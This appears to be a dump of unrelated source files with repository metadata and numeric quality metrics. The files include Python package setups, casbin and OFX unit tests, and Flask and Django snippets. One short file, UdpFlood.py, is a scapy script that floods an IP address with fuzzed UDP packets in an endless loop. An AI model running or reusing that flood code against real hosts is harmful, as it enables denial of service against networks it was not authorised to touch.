| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 0.117241
| 145
| 5
| 52
| 29
| 0.804688
| 0.917241
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4a6696ec4c6465c5bb5ce278f1fe1750f3c4fb76
| 326
|
py
|
Python
|
setup.py
|
dilayercelik/gauss-bino-distributions-ercelik
|
d11eb3ef638e020fdf84188ea1a6f0222401c5b5
|
[
"MIT"
] | null | null | null |
setup.py
|
dilayercelik/gauss-bino-distributions-ercelik
|
d11eb3ef638e020fdf84188ea1a6f0222401c5b5
|
[
"MIT"
] | null | null | null |
setup.py
|
dilayercelik/gauss-bino-distributions-ercelik
|
d11eb3ef638e020fdf84188ea1a6f0222401c5b5
|
[
"MIT"
] | null | null | null |
from setuptools import setup
setup(name = 'gauss_bino_distributions_ercelik',
version = '0.1',
description = 'Gaussian and Binomial distributions',
packages = ['gauss_bino_distributions_ercelik'],
author = 'Dilay Fidan Ercelik',
author_email = 'dilay.ercelik@gmail.com',
zip_safe = False)
| 32.6
| 58
| 0.693252
| 36
| 326
| 6.055556
| 0.722222
| 0.082569
| 0.201835
| 0.266055
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007722
| 0.205521
| 326
| 9
| 59
| 36.222222
| 0.833977
| 0
| 0
| 0
| 0
| 0
| 0.441718
| 0.266871
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4a6f893f263e04064a03a1c589cfb6b634d96a7b
| 756
|
py
|
Python
|
tests/test_file_manager.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
tests/test_file_manager.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
tests/test_file_manager.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
import pytest
# from bkgb.utils.file_manager import *
# def test_decompress_gz():
# f_in = "test_data/dummy.gz"
# assert decompress_gz(f_in) != None
#
#
# def test_decompress_tar():
# f_in = "test_data/dummy.tar"
# assert decompress_tar(f_in) != None
#
#
# def test_decompress_file():
# f_in = "test_data/dummy.gz"
# assert decompress_file(f_in) != None
#
# f_in = "test_data/dummy.tar"
# assert decompress_file(f_in) != None
#
# f_in = "test_data/dummy.zip"
# with pytest.raises(NotImplementedError):
# decompress_file(f_in) != None
# def test_split_file():
# f_in = "test_data/test_split_file/test.nq"
# split_file(f_in, prefix="test_data/test_split_file/test.", max_size=10)
# assert True
| 24.387097
| 77
| 0.665344
| 112
| 756
| 4.142857
| 0.258929
| 0.077586
| 0.090517
| 0.142241
| 0.674569
| 0.590517
| 0.37931
| 0.37931
| 0.185345
| 0.185345
| 0
| 0.003284
| 0.194444
| 756
| 30
| 78
| 25.2
| 0.758621
| 0.90873
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
4a8926526c2081a3e44adbbfbce1c64a42a24d9e
| 217
|
py
|
Python
|
src/custom_flask/custom_filter.py
|
kitoku-magic/python_library
|
a02df73bd60189c7ff679a5199854af7380cd720
|
[
"MIT"
] | null | null | null |
src/custom_flask/custom_filter.py
|
kitoku-magic/python_library
|
a02df73bd60189c7ff679a5199854af7380cd720
|
[
"MIT"
] | null | null | null |
src/custom_flask/custom_filter.py
|
kitoku-magic/python_library
|
a02df73bd60189c7ff679a5199854af7380cd720
|
[
"MIT"
] | null | null | null |
from python_library.src import markupsafe
# テンプレートファイルから呼び出すfilter関数群
def nl2br(value):
"""
改行コードを、HTMLの改行に変換する
"""
value = value.__str__().replace('\n', '<br />')
return markupsafe.Markup(value)
| 21.7
| 51
| 0.677419
| 22
| 217
| 6.454545
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005618
| 0.179724
| 217
| 9
| 52
| 24.111111
| 0.792135
| 0.211982
| 0
| 0
| 0
| 0
| 0.051613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
4a8d08f15358d384cdbdcc7cfaaf1fe59560ed6d
| 5,178
|
py
|
Python
|
tests/model/test_policy.py
|
captt-g/pycasbin
|
f0775b4921420fec29da7bd242cb74f0b4971e32
|
[
"Apache-2.0"
] | null | null | null |
tests/model/test_policy.py
|
captt-g/pycasbin
|
f0775b4921420fec29da7bd242cb74f0b4971e32
|
[
"Apache-2.0"
] | null | null | null |
tests/model/test_policy.py
|
captt-g/pycasbin
|
f0775b4921420fec29da7bd242cb74f0b4971e32
|
[
"Apache-2.0"
] | null | null | null |
from unittest import TestCase
from casbin.model import Model
from tests.test_enforcer import get_examples
class TestPolicy(TestCase):
def test_get_policy(self):
m = Model()
m.load_model(get_examples("basic_model.conf"))
rule = ['admin', 'domain1', 'data1', 'read']
m.add_policy('p', 'p', rule)
self.assertTrue(m.get_policy('p', 'p') == [rule])
def test_has_policy(self):
m = Model()
m.load_model(get_examples("basic_model.conf"))
rule = ['admin', 'domain1', 'data1', 'read']
m.add_policy('p', 'p', rule)
self.assertTrue(m.has_policy('p', 'p', rule))
def test_add_policy(self):
m = Model()
m.load_model(get_examples("basic_model.conf"))
rule = ['admin', 'domain1', 'data1', 'read']
self.assertFalse(m.has_policy('p', 'p', rule))
m.add_policy('p', 'p', rule)
self.assertTrue(m.has_policy('p', 'p', rule))
def test_add_role_policy(self):
m = Model()
m.load_model(get_examples("rbac_model.conf"))
p_rule1 = ['alice', 'data1', 'read']
m.add_policy('p', 'p', p_rule1)
self.assertTrue(m.has_policy('p', 'p', p_rule1))
p_rule2 = ['data2_admin', 'data2', 'read']
m.add_policy('p', 'p', p_rule2)
self.assertTrue(m.has_policy('p', 'p', p_rule2))
g_rule = ['alice', 'data2_admin']
m.add_policy('g', 'g', g_rule)
self.assertTrue(m.has_policy('g', 'g', g_rule))
self.assertTrue(m.get_policy('p', 'p') == [p_rule1, p_rule2])
self.assertTrue(m.get_policy('g', 'g') == [g_rule])
def test_update_policy(self):
m = Model()
m.load_model(get_examples("basic_model.conf"))
old_rule = ['admin', 'domain1', 'data1', 'read']
new_rule = ['admin', 'domain1', 'data2', 'read']
m.add_policy('p', 'p', old_rule)
self.assertTrue(m.has_policy('p', 'p', old_rule))
m.update_policy('p', 'p', old_rule, new_rule)
self.assertFalse(m.has_policy('p', 'p', old_rule))
self.assertTrue(m.has_policy('p', 'p', new_rule))
m = Model()
m.load_model(get_examples("priority_model_explicit.conf"))
old_rule = ['1', 'admin', 'data1', 'read', 'allow']
new_rule = ['1', 'admin', 'data2', 'read', 'allow']
m.add_policy('p', 'p', old_rule)
self.assertTrue(m.has_policy('p', 'p', old_rule))
m.update_policy('p', 'p', old_rule, new_rule)
self.assertFalse(m.has_policy('p', 'p', old_rule))
self.assertTrue(m.has_policy('p', 'p', new_rule))
def test_update_policies(self):
m = Model()
m.load_model(get_examples("basic_model.conf"))
old_rules = [['admin', 'domain1', 'data1', 'read'],
['admin', 'domain1', 'data2', 'read'],
['admin', 'domain1', 'data3', 'read']]
new_rules = [['admin', 'domain1', 'data4', 'read'],
['admin', 'domain1', 'data5', 'read'],
['admin', 'domain1', 'data6', 'read']]
m.add_policies('p', 'p', old_rules)
for old_rule in old_rules:
self.assertTrue(m.has_policy('p', 'p', old_rule))
m.update_policies('p', 'p', old_rules, new_rules)
for old_rule in old_rules:
self.assertFalse(m.has_policy('p', 'p', old_rule))
for new_rule in new_rules:
self.assertTrue(m.has_policy('p', 'p', new_rule))
m = Model()
m.load_model(get_examples("priority_model_explicit.conf"))
old_rules = [['1', 'admin', 'data1', 'read', 'allow'],
['1', 'admin', 'data2', 'read', 'allow'],
['1', 'admin', 'data3', 'read', 'allow']]
new_rules = [['1', 'admin', 'data4', 'read', 'allow'],
['1', 'admin', 'data5', 'read', 'allow'],
['1', 'admin', 'data6', 'read', 'allow']]
m.add_policies('p', 'p', old_rules)
for old_rule in old_rules:
self.assertTrue(m.has_policy('p', 'p', old_rule))
m.update_policies('p', 'p', old_rules, new_rules)
for old_rule in old_rules:
self.assertFalse(m.has_policy('p', 'p', old_rule))
for new_rule in new_rules:
self.assertTrue(m.has_policy('p', 'p', new_rule))
def test_remove_policy(self):
m = Model()
m.load_model(get_examples("basic_model.conf"))
rule = ['admin', 'domain1', 'data1', 'read']
m.add_policy('p', 'p', rule)
self.assertTrue(m.has_policy('p', 'p', rule))
m.remove_policy('p', 'p', rule)
self.assertFalse(m.has_policy('p', 'p', rule))
self.assertFalse(m.remove_policy('p', 'p', rule))
def test_remove_filtered_policy(self):
m = Model()
m.load_model(get_examples("rbac_with_domains_model.conf"))
rule = ['admin', 'domain1', 'data1', 'read']
m.add_policy('p', 'p', rule)
res = m.remove_filtered_policy('p', 'p', 1, 'domain1', 'data1')
self.assertTrue(res)
res = m.remove_filtered_policy('p', 'p', 1, 'domain1', 'data1')
self.assertFalse(res)
| 33.843137
| 71
| 0.549633
| 688
| 5,178
| 3.90843
| 0.082849
| 0.03347
| 0.107103
| 0.077724
| 0.802529
| 0.746374
| 0.729639
| 0.692079
| 0.618446
| 0.618446
| 0
| 0.015625
| 0.258401
| 5,178
| 152
| 72
| 34.065789
| 0.684635
| 0
| 0
| 0.570093
| 0
| 0
| 0.152182
| 0.016222
| 0
| 0
| 0
| 0
| 0.242991
| 1
| 0.074766
| false
| 0
| 0.028037
| 0
| 0.11215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4a90e1faecd5e8cce8ff42696cc3267eb34046ed
| 5,459
|
py
|
Python
|
test/ofx_validators.py
|
arda2525/fixofx
|
1792d94697af682ca1d4a75cfefe98465d95a288
|
[
"Apache-2.0"
] | 50
|
2015-01-01T00:14:04.000Z
|
2020-11-26T04:44:30.000Z
|
test/ofx_validators.py
|
arda2525/fixofx
|
1792d94697af682ca1d4a75cfefe98465d95a288
|
[
"Apache-2.0"
] | 3
|
2016-01-31T17:14:41.000Z
|
2017-03-01T13:36:17.000Z
|
test/ofx_validators.py
|
arda2525/fixofx
|
1792d94697af682ca1d4a75cfefe98465d95a288
|
[
"Apache-2.0"
] | 15
|
2015-10-29T09:04:21.000Z
|
2022-01-19T17:33:25.000Z
|
# Copyright 2005-2010 Wesabe, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '../3rdparty')
sys.path.insert(0, '../lib')
import ofx
import unittest
class ValidatorTests(unittest.TestCase):
def setUp(self):
self.good_aba = ofx.RoutingNumber("314074269")
self.bad_aba = ofx.RoutingNumber("123456789")
def test_not_a_number(self):
nan = ofx.RoutingNumber("123abd")
self.assertEqual(nan.is_valid(), False)
self.assertEqual(nan.get_type(), None)
self.assertEqual(nan.get_region(), None)
self.assertEqual(str(nan),
"123abd (valid: False; type: None; region: None)")
def test_valid_aba(self):
self.assertEqual(self.good_aba.is_valid(), True)
self.assertEqual(self.bad_aba.is_valid(), False)
def test_aba_types(self):
self.assertEqual(ofx.RoutingNumber("001234567").get_type(),
"United States Government")
self.assertEqual(ofx.RoutingNumber("011234567").get_type(),
"Primary")
self.assertEqual(ofx.RoutingNumber("071234567").get_type(),
"Primary")
self.assertEqual(ofx.RoutingNumber("121234567").get_type(),
"Primary")
self.assertEqual(ofx.RoutingNumber("131234567").get_type(),
None)
self.assertEqual(ofx.RoutingNumber("201234567").get_type(),
None)
self.assertEqual(ofx.RoutingNumber("211234567").get_type(),
"Thrift")
self.assertEqual(ofx.RoutingNumber("251234567").get_type(),
"Thrift")
self.assertEqual(ofx.RoutingNumber("321234567").get_type(),
"Thrift")
self.assertEqual(ofx.RoutingNumber("331234567").get_type(),
None)
self.assertEqual(ofx.RoutingNumber("601234567").get_type(),
None)
self.assertEqual(ofx.RoutingNumber("611234567").get_type(),
"Electronic")
self.assertEqual(ofx.RoutingNumber("641234567").get_type(),
"Electronic")
self.assertEqual(ofx.RoutingNumber("721234567").get_type(),
"Electronic")
self.assertEqual(ofx.RoutingNumber("731234567").get_type(),
None)
self.assertEqual(ofx.RoutingNumber("791234567").get_type(),
None)
self.assertEqual(ofx.RoutingNumber("801234567").get_type(),
"Traveller's Cheque")
self.assertEqual(ofx.RoutingNumber("811234567").get_type(),
None)
def test_aba_regions(self):
self.assertEqual(ofx.RoutingNumber("001234567").get_region(),
"United States Government")
self.assertEqual(ofx.RoutingNumber("011234567").get_region(),
"Boston")
self.assertEqual(ofx.RoutingNumber("071234567").get_region(),
"Chicago")
self.assertEqual(ofx.RoutingNumber("121234567").get_region(),
"San Francisco")
self.assertEqual(ofx.RoutingNumber("131234567").get_region(),
None)
self.assertEqual(ofx.RoutingNumber("201234567").get_region(),
None)
self.assertEqual(ofx.RoutingNumber("211234567").get_region(),
"Boston")
self.assertEqual(ofx.RoutingNumber("251234567").get_region(),
"Richmond")
self.assertEqual(ofx.RoutingNumber("321234567").get_region(),
"San Francisco")
self.assertEqual(ofx.RoutingNumber("331234567").get_region(),
None)
self.assertEqual(ofx.RoutingNumber("601234567").get_region(),
None)
self.assertEqual(ofx.RoutingNumber("611234567").get_region(),
"Boston")
self.assertEqual(ofx.RoutingNumber("641234567").get_region(),
"Cleveland")
self.assertEqual(ofx.RoutingNumber("721234567").get_region(),
"San Francisco")
self.assertEqual(ofx.RoutingNumber("731234567").get_region(),
None)
self.assertEqual(ofx.RoutingNumber("791234567").get_region(),
None)
self.assertEqual(ofx.RoutingNumber("801234567").get_region(),
"Traveller's Cheque")
self.assertEqual(ofx.RoutingNumber("811234567").get_region(),
None)
def test_aba_string(self):
self.assertEqual(str(self.good_aba),
"314074269 (valid: True; type: Thrift; region: Dallas)")
if __name__ == '__main__':
unittest.main()
| 44.745902
| 81
| 0.574831
| 518
| 5,459
| 5.932432
| 0.264479
| 0.209893
| 0.210869
| 0.363163
| 0.64725
| 0.629678
| 0.543768
| 0.131468
| 0.080703
| 0
| 0
| 0.09805
| 0.305001
| 5,459
| 121
| 82
| 45.115702
| 0.711914
| 0.102033
| 0
| 0.336735
| 0
| 0
| 0.14464
| 0
| 0
| 0
| 0
| 0
| 0.438776
| 1
| 0.061224
| false
| 0
| 0.030612
| 0
| 0.102041
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4a9de91ebc2f5c5c49ecb34c4d4ed44e831e98c3
| 127
|
py
|
Python
|
codes_auto/1586.longest-subarray-of-1s-after-deleting-one-element.py
|
smartmark-pro/leetcode_record
|
6504b733d892a705571eb4eac836fb10e94e56db
|
[
"MIT"
] | null | null | null |
codes_auto/1586.longest-subarray-of-1s-after-deleting-one-element.py
|
smartmark-pro/leetcode_record
|
6504b733d892a705571eb4eac836fb10e94e56db
|
[
"MIT"
] | null | null | null |
codes_auto/1586.longest-subarray-of-1s-after-deleting-one-element.py
|
smartmark-pro/leetcode_record
|
6504b733d892a705571eb4eac836fb10e94e56db
|
[
"MIT"
] | null | null | null |
#
# @lc app=leetcode.cn id=1586 lang=python3
#
# [1586] longest-subarray-of-1s-after-deleting-one-element
#
None
# @lc code=end
| 18.142857
| 58
| 0.716535
| 21
| 127
| 4.333333
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088496
| 0.110236
| 127
| 7
| 59
| 18.142857
| 0.716814
| 0.866142
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4aa6229f74767879d85251735c51d8ab079625eb
| 1,114
|
py
|
Python
|
setup.py
|
sk1p/django-codemirror2
|
07a3236e3e2b730cf47a1c08e58017b7f2528a46
|
[
"MIT"
] | 22
|
2015-03-19T16:37:15.000Z
|
2021-02-24T08:42:07.000Z
|
setup.py
|
sk1p/django-codemirror2
|
07a3236e3e2b730cf47a1c08e58017b7f2528a46
|
[
"MIT"
] | 6
|
2015-07-07T09:59:05.000Z
|
2020-11-23T10:36:53.000Z
|
setup.py
|
sk1p/django-codemirror2
|
07a3236e3e2b730cf47a1c08e58017b7f2528a46
|
[
"MIT"
] | 4
|
2015-05-26T09:26:56.000Z
|
2017-03-01T10:43:22.000Z
|
from setuptools import setup
setup(
name="django-codemirror2",
version="0.2.1.dev1",
author_email="alex@gc-web.de",
author="Alexander Clausen",
url="https://github.com/sk1p/django-codemirror2",
description="Django widgets for replacing textareas with CodeMirror2,"
" an in-browser code editor",
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Framework :: Django :: 1.8',
'Framework :: Django :: 1.9',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: JavaScript',
'Topic :: Text Editors',
],
include_package_data=True,
packages=[
"codemirror2",
"codemirror2.tests",
],
)
| 32.764706
| 74
| 0.585278
| 108
| 1,114
| 6.009259
| 0.62963
| 0.204931
| 0.231125
| 0.120185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028395
| 0.27289
| 1,114
| 33
| 75
| 33.757576
| 0.77284
| 0
| 0
| 0.0625
| 0
| 0
| 0.60772
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.03125
| 0
| 0.03125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4ab5c78709fe3304f074ebf6931f294a04838e51
| 93
|
py
|
Python
|
doc2mysql/apps.py
|
tututou/reportonlie_os
|
527a0325ef8b5a555566a1ca55414f88e9831884
|
[
"Apache-2.0"
] | null | null | null |
doc2mysql/apps.py
|
tututou/reportonlie_os
|
527a0325ef8b5a555566a1ca55414f88e9831884
|
[
"Apache-2.0"
] | null | null | null |
doc2mysql/apps.py
|
tututou/reportonlie_os
|
527a0325ef8b5a555566a1ca55414f88e9831884
|
[
"Apache-2.0"
] | null | null | null |
from django.apps import AppConfig
class Doc2MysqlConfig(AppConfig):
name = 'doc2mysql'
| 15.5
| 33
| 0.763441
| 10
| 93
| 7.1
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025641
| 0.16129
| 93
| 5
| 34
| 18.6
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
4358becf1740d8473654cc9222529da6126c1d03
| 221
|
py
|
Python
|
contact/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
contact/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
contact/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
from django.contrib import admin
from contact.models import Contact
# Register your models here.
# Registers model "Contact" in order to make it visible on admin page <hostname:8000>/admin/.
admin.site.register(Contact)
| 31.571429
| 93
| 0.791855
| 33
| 221
| 5.30303
| 0.69697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020833
| 0.131222
| 221
| 7
| 94
| 31.571429
| 0.890625
| 0.533937
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
435aef1e2360b5219178c4652227ee7ca9e94133
| 334
|
py
|
Python
|
project/views.py
|
lowell-dev-club/live-flask-workshop
|
a57a3db79fd772a6676ad3bce1ff45e1a5c1c06d
|
[
"MIT"
] | null | null | null |
project/views.py
|
lowell-dev-club/live-flask-workshop
|
a57a3db79fd772a6676ad3bce1ff45e1a5c1c06d
|
[
"MIT"
] | null | null | null |
project/views.py
|
lowell-dev-club/live-flask-workshop
|
a57a3db79fd772a6676ad3bce1ff45e1a5c1c06d
|
[
"MIT"
] | null | null | null |
# Import Flask app object from project folder (For python this means from the __init__.py file)
from project import app
# Import functions from flask package
from flask import render_template
# Create new route at '/'
@app.route('/')
def home():
# return the rendered version of file.html
return render_template('file.html')
| 30.363636
| 95
| 0.751497
| 50
| 334
| 4.9
| 0.6
| 0.089796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170659
| 334
| 11
| 96
| 30.363636
| 0.884477
| 0.580838
| 0
| 0
| 0
| 0
| 0.073529
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 4
|
436f3a14775b38a4e0058c1fdb39a3c69361719c
| 71
|
py
|
Python
|
UdpFlood.py
|
ep4sh/pyddos
|
95e86dbc3249f4ce9bb36c71663f0851d4db82cf
|
[
"MIT"
] | 15
|
2018-02-18T04:13:23.000Z
|
2022-03-10T18:24:36.000Z
|
UdpFlood.py
|
ep4sh/pyddos
|
95e86dbc3249f4ce9bb36c71663f0851d4db82cf
|
[
"MIT"
] | null | null | null |
UdpFlood.py
|
ep4sh/pyddos
|
95e86dbc3249f4ce9bb36c71663f0851d4db82cf
|
[
"MIT"
] | 7
|
2019-09-04T02:38:17.000Z
|
2022-02-10T07:00:26.000Z
|
from scapy.all import *
send(IP(dst="10.50.0.1")/fuzz(UDP()),loop=1)
| 14.2
| 44
| 0.633803
| 15
| 71
| 3
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 0.098592
| 71
| 4
| 45
| 17.75
| 0.59375
| 0
| 0
| 0
| 0
| 0
| 0.128571
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
4386a3475bdcaa09be9ee0a00c8c410d6943d8d7
| 480
|
py
|
Python
|
contrack/__init__.py
|
kinow/ConTrack
|
04d36581270e59094c11bc3938b79d8c72b8824e
|
[
"MIT"
] | 41
|
2020-06-23T17:18:22.000Z
|
2022-01-23T11:02:43.000Z
|
contrack/__init__.py
|
kinow/ConTrack
|
04d36581270e59094c11bc3938b79d8c72b8824e
|
[
"MIT"
] | 2
|
2020-11-01T14:01:10.000Z
|
2020-11-04T09:45:21.000Z
|
contrack/__init__.py
|
kinow/ConTrack
|
04d36581270e59094c11bc3938b79d8c72b8824e
|
[
"MIT"
] | 11
|
2020-06-23T16:05:57.000Z
|
2021-01-28T07:22:40.000Z
|
"""
Description
-----------
The contrack package provides classes and function to read, write, plot and
analyze circulation anomalies in weather and climate data.
Content
-------
The following classes are available:
contrack: To create a contrack object with functions to detect and track circulation anomalies
Examples
--------
>>> filename = 'era5_clim_z500.nc'
>>> blocking = contrack()
>>> blocking.read(filename)
"""
from .contrack import contrack # noqa
| 17.777778
| 100
| 0.70625
| 57
| 480
| 5.912281
| 0.701754
| 0.118694
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010076
| 0.172917
| 480
| 26
| 101
| 18.461538
| 0.838791
| 0.908333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
438ee556f1bd5d0b76d8988c83c0173d7de3c0cc
| 801
|
py
|
Python
|
submission/ShreshthTuli_2016CS10680_SamarthAggarwal_2016CS10395_LA2/code/timer.py
|
shreshthtuli/Go-Back-N
|
f1f53fee703bda0ea51e62c0fe3b2fdf16161190
|
[
"Apache-2.0"
] | null | null | null |
submission/ShreshthTuli_2016CS10680_SamarthAggarwal_2016CS10395_LA2/code/timer.py
|
shreshthtuli/Go-Back-N
|
f1f53fee703bda0ea51e62c0fe3b2fdf16161190
|
[
"Apache-2.0"
] | null | null | null |
submission/ShreshthTuli_2016CS10680_SamarthAggarwal_2016CS10395_LA2/code/timer.py
|
shreshthtuli/Go-Back-N
|
f1f53fee703bda0ea51e62c0fe3b2fdf16161190
|
[
"Apache-2.0"
] | null | null | null |
# timer.py - A timer class
import time
class Timer(object):
TIMER_STOP = -1
def __init__(self, duration):
self._start_time = self.TIMER_STOP
self._duration = duration
# Starts the timer
def start(self):
if self._start_time == self.TIMER_STOP:
self._start_time = time.time()
# Stops the timer
def stop(self):
if self._start_time != self.TIMER_STOP:
self._start_time = self.TIMER_STOP
# Determines whether the timer is runnning
def running(self):
return self._start_time != self.TIMER_STOP
# Determines whether the timer timed out
def timeout(self):
if not self.running():
return False
else:
return time.time() - self._start_time >= self._duration
| 25.03125
| 67
| 0.619226
| 103
| 801
| 4.563107
| 0.291262
| 0.134043
| 0.193617
| 0.217021
| 0.444681
| 0.444681
| 0.444681
| 0.380851
| 0.380851
| 0.380851
| 0
| 0.001773
| 0.29588
| 801
| 31
| 68
| 25.83871
| 0.83156
| 0.171036
| 0
| 0.105263
| 0
| 0
| 0
| 0
